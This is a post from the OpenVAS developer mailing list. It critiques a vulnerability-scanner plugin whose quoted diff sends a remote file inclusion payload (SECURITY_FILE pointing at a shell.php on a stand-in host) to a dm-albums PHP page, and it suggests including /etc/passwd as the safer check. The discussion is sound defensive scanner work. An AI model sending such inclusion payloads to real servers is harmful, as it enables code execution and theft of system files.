Hi,

I really don't think that plugins should be running with references
to injection code that is hosted on an uncontrolled 3rd party site.
That allows for introducing untrusted code into the scanner.

I may be wrong in terms of how the vulnerable album.php operates,
but if it truly does do an include, this is not the way to test it.
Instead, on *IX systems, the typical mode of operation is to
include a file such as /etc/passwd and grep for 'root' (see
Yap_Blog_remote-file_include.nasl for an example), or check
phpWebThings_35313.nasl for an example on how to check for
a vulnerability on either *IX or MS.

Thomas


>    trunk/openvas-plugins/scripts/gb_dm_filemanager_file_inc_vuln.nasl
e

> +  sndReq = http_get(item:dmfVer[2] + "/dm-albums/template/album.php?" +
> +                    "SECURITY_FILE=http://example.net/shell.php";, 
> port:dmfPort);


_______________________________________________
Openvas-devel mailing list
Openvas-devel@wald.intevation.org
http://lists.wald.intevation.org/mailman/listinfo/openvas-devel

Reply via email to